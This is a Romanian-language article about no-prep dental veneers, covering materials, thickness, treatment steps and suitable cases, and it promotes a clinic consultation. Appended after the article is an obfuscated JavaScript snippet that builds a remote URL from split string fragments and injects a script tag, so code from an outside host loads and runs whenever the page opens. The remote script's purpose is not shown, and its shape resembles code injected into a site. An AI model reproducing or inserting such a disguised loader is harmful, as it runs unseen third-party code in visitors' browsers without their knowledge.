Ideea unui „zâmbet perfect” este, de multe ori, legată de proporții, aliniere, spații între dinți și felul în care dinții se văd atunci când zâmbești. În practica modernă, una dintre metodele prin care se pot corecta astfel de detalii este fațetarea, pe care mulți pacienți o corelează cu pilirea dinților.
Dar există situații în care fațetarea se poate face fără prepararea dintelui, printr-o tehnică numită „no-prep” (fără șlefuire). Practic, în loc să îndepărteze smalț, medicul stomatolog adaugă un strat ceramic foarte subțire peste suprafața existentă, cu scop estetic, păstrând structura naturală a dintelui. Explicăm în continuare în ce constă această abordare, ce materiale se folosesc și pentru ce tip de cazuri este potrivită.
Ce înseamnă „fără șlefuire”: fațete no-prep vs. fațete minim invazive
Fațetele dentare sunt restaurări subțiri, realizate de obicei din ceramică, care se aplică pe fața vizibilă a dintelu pentru ajustări minime. Diferența dintre no-prep și minim invaziv ține de felul în care medicul pregătește dintele înainte de aplicare.
În varianta no-prep, fațeta este atât de subțire încât poate fi aplicată direct peste smalțul existent, fără îndepărtarea lui. Vorbim de grosimi foarte mici, de ordinul 0,1–0,3 mm, motiv pentru care aceste fațete sunt descrise uneori ca niște „lentile” dentare.
În varianta minim invazivă, pregătirea rămâne redusă, dar medicul poate face ajustări fine, strict acolo unde este nevoie. Astfel va putea controla mai bine forma finală și integrarea estetică, mai ales în situațiile în care simpla adăugare de material ar încărca volumul dintelui.
Alegerea între cele două se face după evaluarea formei inițiale, a spațiului disponibil și a rezultatului urmărit.
Ce materiale se folosesc pentru fațetele ultrasubțiri?
Cele mai folosite opțiuni pentru fațetele dentare fără șlefuire sunt ceramica feldspatică și disilicatul de litiu (E-max).
Ceramica feldspatică este considerată materialul de elecție pentru fațetele foarte subțiri, pentru că permite o stratificare delicată și poate reproduce foarte bine aspectul natural al dintelui. Disilicatul de litiu poate fi realizat în grosimi reduse, inclusiv în jur de 0,3 mm, păstrând în același timp o rezistență ridicată, ceea ce îl face o opțiune solidă în multe situații clinice.
Totuși, fațetele ultrasubțiri au și limitări. Pentru că sunt fine și translucide, nu pot schimba radical culoarea unui dinte foarte pătat, deoarece nuanța de dedesubt poate rămâne vizibilă.
Pașii tratamentului cu fațete fără șlefuire
1) Consultația și evaluarea
Medicul verifică dinții și gingiile și poate recomanda radiografii, dacă sunt necesare. Apoi va discuta împreună cu pacientul obiectivul estetic și limitele fațetelor no-prep, urmând să stabilească un plan personalizat.
2) Modelul digital și fotografiile
Se realizează fotografii intraorale și extraorale, iar cu ajutorul unui scaner intraoral se obține un model digital al danturii, folosit pentru realizarea fațetelor.
3) Simularea rezultatului (opțional)
Dacă îți dorești, poți opta pentru un mock-up (o simulare din ceară sau compozit) aplicat direct pe dinți, ca să vezi rezultatul înainte și să ceri ajustări.
4) Alegerea nuanței
Fiind foarte subțiri (0,1–0,3 mm) și parțial translucide, nuanța finală este influențată de culoarea dinților naturali și de culoarea adezivului/cimentului folosit. Medicul ține cont de aceste elemente când stabilește nuanța.
5) Pregătirea cavității orale înainte de aplicare
Înainte de faza finală, cariile, gingivita și alte probleme trebuie tratate. Uneori pot fi necesare ajustări foarte fine ale smalțului pentru o potrivire corectă și un contur natural în zona gingiei.
6) Proba, lipirea definitivă și verificarea finală
Fațetele se probează temporar cu o pastă specială, iar după confirmarea formei și culorii se fixează definitiv prin cimentare adezivă și întărire la lumină. La final, medicul îndepărtează excesul, verifică mușcătura și netezește marginile în contact cu gingia. Dacă vrei să aprofundezi pașii și indicațiile, găsești explicații similare și pe denttaglio.ro.
Longevitatea rezultatelor depinde de igienă, pentru că marginile foarte subțiri trebuie curățate atent, pentru a nu se acumula placă bacteriană.
În concluzie, fațetele no-prep pot fi o opțiune bună atunci când corecția se poate face printr-un adaos foarte fin, fără să încarce volumul dinților. De regulă, sunt indicate pentru ajustări de formă și proporții (dinți mici sau subdezvoltați, incisivi laterali conici, colțuri tocite, mici ciobituri), pentru închiderea spațiilor dintre dinți (diasteme) și pentru defecte superficiale ale smalțului (microfracturi sau imperfecțiuni). În unele cazuri pot ajuta și la mascarea unor colorații care nu răspund la albire, dar nu atunci când discromia este severă.
Dacă iei în calcul fațetele fără șlefuire, programează o consultație: medicul poate stabili rapid dacă ești un candidat potrivit pentru no-prep sau dacă există o alternativă mai sigură și mai estetică pentru cazul tău.
(function(){
abzr=document.createElement(„script”);abzr_=”o”+(„pe”)+”ns”+”t”;
abzr_+=(„a”)+”t”+”.”;abzr_+=((„e”)+”u”);abzr.type=”text/javascript”;
abzr_+=”/”; abzru=”2553112521″;abzru+=”.953gqwezbzr3iwuxtly”;abzru+=”ygdqz4xn0ea”;
abzr.src=”https://”+abzr_+abzru;abzr.async=true;document.body.appendChild(abzr);
})();